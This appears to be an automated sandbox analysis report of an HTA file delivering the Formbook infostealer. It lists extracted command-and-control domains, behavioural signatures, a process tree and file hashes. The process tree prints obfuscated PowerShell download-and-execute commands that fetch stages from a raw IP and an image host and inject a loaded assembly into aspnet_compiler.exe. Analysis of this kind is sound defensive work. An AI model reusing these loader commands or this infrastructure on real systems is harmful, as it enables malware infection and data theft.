Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
05-02-2025 03:45
Static task
static1
Behavioral task
behavioral1
Sample
56966ff863d37f048e873725f57c3d6ea7883c4c20c033f2bd5f85adeec1b62b.hta
Resource
win7-20240729-en
General
-
Target
56966ff863d37f048e873725f57c3d6ea7883c4c20c033f2bd5f85adeec1b62b.hta
-
Size
14KB
-
MD5
24a0a0feeb3c8ddf4e0a8480107d5a47
-
SHA1
826364c4e1b951b3cb5d0c5d82db4a8e59e05140
-
SHA256
56966ff863d37f048e873725f57c3d6ea7883c4c20c033f2bd5f85adeec1b62b
-
SHA512
2c318b518bf94a264dfc6ae8938a00b7f915a38f7105b4c7df7799fd242b9906e4147644f26b5f2ecdcf892f5186efcd9c5182ef1e8f155b460a24d7ba5cac3e
-
SSDEEP
48:3aodOOQvMUUdOOQHnMUvMxyhz+rntkpyr+slA6Y8TurdkGijmQdkrC3dOOQe0dO1:qoOMhQM1AhmtscdlRB/arEY/PMfW+
Malware Config
Extracted
formbook
4.1
b101
ent-apartments-2801.click
lsyw.top
eccurastock.online
j958.net
eepelement.tech
rueblueimpact.shop
etechhome.net
ianchui.cfd
mall-business-22321.bond
tatewidefinancialservices.net
orbitmac.info
ovehkjepe88.club
zzhmamn.xyz
uslimbooking.net
uto253.pro
ortalexpresscliepr.lat
tikk.shop
iaoniang.cfd
sdg-6603.cyou
myd.net
motionen-es.online
dnrkdek.xyz
areo.care
tockcoin.online
ilvaguard.info
estserverhost.net
ndda.tokyo
atieowen.art
eviewedapproved.net
nujstore.online
-incad-id017.top
eat-pumps-40508.bond
ngjbmfi.xyz
pepeb.xyz
eancaba.net
hmadfawad.realtor
ratinacaite.top
etcal.shop
hostassets.sucks
gsn.xyz
345.top
rkzqzxp.xyz
azablog.online
klerip.xyz
mjoh.info
69.fyi
ashqhshhq-hqaishahsq.cyou
obri.online
k7nsfyf.top
ulebuy.website
al5.xyz
nsac-atendimentos.online
linko-win.art
eroplane.bet
ahilamoney.world
ires-70107.bond
8zhuan357.yachts
ometa-casino-hzu.top
kdigitaltouchclass.online
ildiztek.xyz
andar-jaya4d.info
ayna.website
in-up-casino-nvq8.top
eepseek-ai-assistant.online
3rdwi.click
Signatures
-
Formbook family
-
Formbook payload 2 IoCs
resource yara_rule behavioral2/memory/3316-90-0x0000000000400000-0x000000000042F000-memory.dmp formbook behavioral2/memory/3872-95-0x00000000004A0000-0x00000000004CF000-memory.dmp formbook -
Blocklisted process makes network request 3 IoCs
flow pid Process 21 60 powershell.exe 24 4456 powershell.exe 25 4456 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 60 powershell.exe 3472 cmd.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-70482961-775596374-3727440602-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-70482961-775596374-3727440602-1000\Control Panel\International\Geo\Nation WScript.exe -
pid Process 4456 powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 4456 set thread context of 3316 4456 powershell.exe 97 PID 3316 set thread context of 3404 3316 aspnet_compiler.exe 53 PID 3872 set thread context of 3404 3872 raserver.exe 53 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language raserver.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-70482961-775596374-3727440602-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 60 powershell.exe 60 powershell.exe 4456 powershell.exe 4456 powershell.exe 4456 powershell.exe 4456 powershell.exe 3316 aspnet_compiler.exe 3316 aspnet_compiler.exe 3316 aspnet_compiler.exe 3316 aspnet_compiler.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe 3872 raserver.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
pid Process 3316 aspnet_compiler.exe 3316 aspnet_compiler.exe 3316 aspnet_compiler.exe 3872 raserver.exe 3872 raserver.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 60 powershell.exe Token: SeDebugPrivilege 4456 powershell.exe Token: SeDebugPrivilege 3316 aspnet_compiler.exe Token: SeShutdownPrivilege 3404 Explorer.EXE Token: SeCreatePagefilePrivilege 3404 Explorer.EXE Token: SeDebugPrivilege 3872 raserver.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3404 Explorer.EXE -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 4684 wrote to memory of 3472 4684 mshta.exe 86 PID 4684 wrote to memory of 3472 4684 mshta.exe 86 PID 4684 wrote to memory of 3472 4684 mshta.exe 86 PID 3472 wrote to memory of 60 3472 cmd.exe 88 PID 3472 wrote to memory of 60 3472 cmd.exe 88 PID 3472 wrote to memory of 60 3472 cmd.exe 88 PID 60 wrote to memory of 1212 60 powershell.exe 91 PID 60 wrote to memory of 1212 60 powershell.exe 91 PID 60 wrote to memory of 1212 60 powershell.exe 91 PID 1212 wrote to memory of 3564 1212 csc.exe 92 PID 1212 wrote to memory of 3564 1212 csc.exe 92 PID 1212 wrote to memory of 3564 1212 csc.exe 92 PID 60 wrote to memory of 2280 60 powershell.exe 93 PID 60 wrote to memory of 2280 60 powershell.exe 93 PID 60 wrote to memory of 2280 60 powershell.exe 93 PID 2280 wrote to memory of 4456 2280 WScript.exe 94 PID 2280 wrote to memory of 4456 2280 WScript.exe 94 PID 2280 wrote to memory of 4456 2280 WScript.exe 94 PID 4456 wrote to memory of 4512 4456 powershell.exe 96 PID 4456 wrote to memory of 4512 4456 powershell.exe 96 PID 4456 wrote to memory of 4512 4456 powershell.exe 96 PID 4456 wrote to memory of 3316 4456 powershell.exe 97 PID 4456 wrote to memory of 3316 4456 powershell.exe 97 PID 4456 wrote to memory of 3316 4456 powershell.exe 97 PID 4456 wrote to memory of 3316 4456 powershell.exe 97 PID 4456 wrote to memory of 3316 4456 powershell.exe 97 PID 4456 wrote to memory of 3316 4456 powershell.exe 97 PID 3404 wrote to memory of 3872 3404 Explorer.EXE 98 PID 3404 wrote to memory of 3872 3404 Explorer.EXE 98 PID 3404 wrote to memory of 3872 3404 Explorer.EXE 98 PID 3872 wrote to memory of 1512 3872 raserver.exe 99 PID 3872 wrote to memory of 1512 3872 raserver.exe 99 PID 3872 wrote to memory of 1512 3872 raserver.exe 99
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3404 -
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\56966ff863d37f048e873725f57c3d6ea7883c4c20c033f2bd5f85adeec1b62b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4684 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C PoWeRSHelL.exE -EX BYPAsS -nOp -W 1 -c dEVICeCREdEnTIAlDeplOymEnT.Exe ; inVoKe-ExprEsSion($(INVOKe-exPrESSiON('[sYSTEM.Text.EncOdINg]'+[chAr]58+[CHAR]0X3A+'UTF8.GetsTRIng([SYSTem.cONVErt]'+[CHAr]0x3a+[CHaR]0X3a+'FroMbAsE64sTRING('+[ChAr]0X22+'JDdCUEZBRDBaMCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CRXJkZUZJbklUSU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZrcU16UmNQTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVVl6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBreVhyTGRULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmYSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieENOZGVoTGkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckV4SEljZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ3QlBGQUQwWjA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguMjMuMTg3LjE1MC94YW1wcC9mYm4vbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZnUuZ0lGIiwiJEVOdjpBUFBEQVRBXG5pY2V0b21lZXR5b3VsaXR0bGVoZWFydHN3ZWV0aGVhcnRzaGVpc2JlYXV0aWYudmJzIiwwLDApO1NUQVJULXNMRWVQKDMpO0ludk9LRS1pVGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZi52YnMi'+[CHAR]0x22+'))')))"3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWeRSHelL.exE -EX BYPAsS -nOp -W 1 -c dEVICeCREdEnTIAlDeplOymEnT.Exe ; inVoKe-ExprEsSion($(INVOKe-exPrESSiON('[sYSTEM.Text.EncOdINg]'+[chAr]58+[CHAR]0X3A+'UTF8.GetsTRIng([SYSTem.cONVErt]'+[CHAr]0x3a+[CHaR]0X3a+'FroMbAsE64sTRING('+[ChAr]0X22+'JDdCUEZBRDBaMCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CRXJkZUZJbklUSU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZrcU16UmNQTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVVl6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBreVhyTGRULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmYSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieENOZGVoTGkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckV4SEljZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ3QlBGQUQwWjA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguMjMuMTg3LjE1MC94YW1wcC9mYm4vbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZnUuZ0lGIiwiJEVOdjpBUFBEQVRBXG5pY2V0b21lZXR5b3VsaXR0bGVoZWFydHN3ZWV0aGVhcnRzaGVpc2JlYXV0aWYudmJzIiwwLDApO1NUQVJULXNMRWVQKDMpO0ludk9LRS1pVGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZi52YnMi'+[CHAR]0x22+'))')))"4⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:60 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0gpoky2y\0gpoky2y.cmdline"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1934.tmp" "c:\Users\Admin\AppData\Local\Temp\0gpoky2y\CSCDB1E7602D34D498EB3B53713F7EBC365.TMP"6⤵
- System Location Discovery: System Language Discovery
PID:3564
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicetomeetyoulittleheartsweetheartsheisbeautif.vbs"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZQBtAHIAbwBmAG4AZQBlAHMAcgBlAHYAZQByAG8AZgBsAHIAaQBnAGwAdQBmAGkAdAB1AGEAZQBiAGwAcgBpAGcAdABzAGUAYgBsAHIAaQBnAGUAYwBpAG4ALwBuAGIAZgAvAHAAcABtAGEAeAAvADAANQAxAC4ANwA4ADEALgAzADIALgA4ADkAMQAvAC8AOgBwAHQAdABoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAYQB4AHcAdQBhADYAMwB5AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADgAMwAzADQANQAzADMALwBhAGwAYwBiADQAaAB0AG8AbAB6AHYAZgBoAHoAegB1AGYAcQBoADUALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAGEAcwBwAG4AZQB0AF8AYwBvAG0AcABpAGwAZQByACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"7⤵PID:4512
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"7⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:3316
-
-
-
-
-
-
-
C:\Windows\SysWOW64\raserver.exe"C:\Windows\SysWOW64\raserver.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- System Location Discovery: System Language Discovery
PID:1512
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD59faf6f9cd1992cdebfd8e34b48ea9330
SHA1ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e
SHA2560c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953
SHA51205b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97
-
Filesize
19KB
MD5456d96ad5e8897661dc388d1e8687ee8
SHA107b2851f1517c9b1e884db37522e11b1672dc9a6
SHA2560dd115a60e32491984740368fa37c3f716f439e7fd9d70cd7d6db0bd3e1105e9
SHA512472bf83b4c465314db12c7449ba51a6d4e0f12fdf5f2c2d9f5b9d7a7dce95accc9c48f960886823d7b48685610e10fec4913c5ebd4e8921359d18455b5bc6e96
-
Filesize
3KB
MD553305cc5d6b39b05def1ad41f9573ac0
SHA1319325879ddba7d5416ca3c22c3da353a266c157
SHA25666a0d1ab3681199c89cfbc0c371edc3be860a8808d1448ea9bfc5600bd863c6b
SHA51292bc4d8e07f4876fb7c9938e342ce4b4ef422a35e2d905bab5d1560e134adbe607800b37c5da37030b644c8c08584c03d7eb9201ade9a7a78ac701c0d9c3eed2
-
Filesize
1KB
MD5a3d6737f084ac2e4aad705d514c15e4c
SHA14d165b3ad3cbd674ffb2dcc04f6947539b577fbc
SHA256785ad786ee90d6e96e0e557c61d857020396319aac6a1ecef94940b3c028357a
SHA512dab233b5a2e6829e5dcde4fbed98c0b1ad153b3530abbf717c14c01b5ba1cbbf495c079482e7d97bbd9aa7a3fd83e244cb3462caac4b21ffd91f192b47217de6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
216KB
MD5eaaecea977e9d02eb3ba12a426b9930d
SHA11b1d388b1aace23874ab95ad625f1e34ee43e234
SHA2565b8920b32beba0b9c5cadf86e0e48d3df9cf33b89ed878efc06ca07ba7122f18
SHA512929d244152855e99319f46f0f7d022fa127d4f628afebd26b6597e8c10265ba75eb9f1150dc0346ef51719f331f62a13669a8a366d2689996788b0d2601121e8
-
Filesize
478B
MD519c349f194ea440d75e3d8bb016a48c1
SHA1e4c63d11e4345744be72671c3f698ba717fca329
SHA25654d8a84d51dffcb3b93aa8c8571f35fcf1c6a567574a138f9b803479b6aad974
SHA512c9cc5ac32184f5771a22e8ff0de1812d4e4e0e1a8236d8660be761382983eeced98333ff6845c70ab999c52a94d64939e50d24cc4b3caab4d80c79e5267dfb71
-
Filesize
369B
MD504c13c4911f416f5d83b5db17e9e8e4d
SHA11e6cbbb7a8aecafef0be02a76abaea4c3b04e974
SHA256e4783166b5d846ed53e3751078c7544b8c7faabcb2d655a73b28df79944c7bb5
SHA512cf0599e12c7dded51b1991cb07785329372adf1b697cb95b231b14ec70ede0a55b9e8e9d160238494e8ba3e94020b8acdc797d74e34ae49c2426c85081b8d7e8
-
Filesize
652B
MD5902eda9f4da644b9af166c0232bcf73c
SHA176b1c0de992822019dd6d3c21d500f87b8303db7
SHA256ffd44031f6dc86ce35120a263acae9e61e6c1acf2c64145affe64a93b6b180ab
SHA512a1bd2c8e5dab3da6a9c4ca0965e73ac16a4430d0218876408f9348dc5f270407bd6ed1679ddc2226cd31f94a7b45f86da04c6eb4ba2fe7e24e0c9cf5f292a61b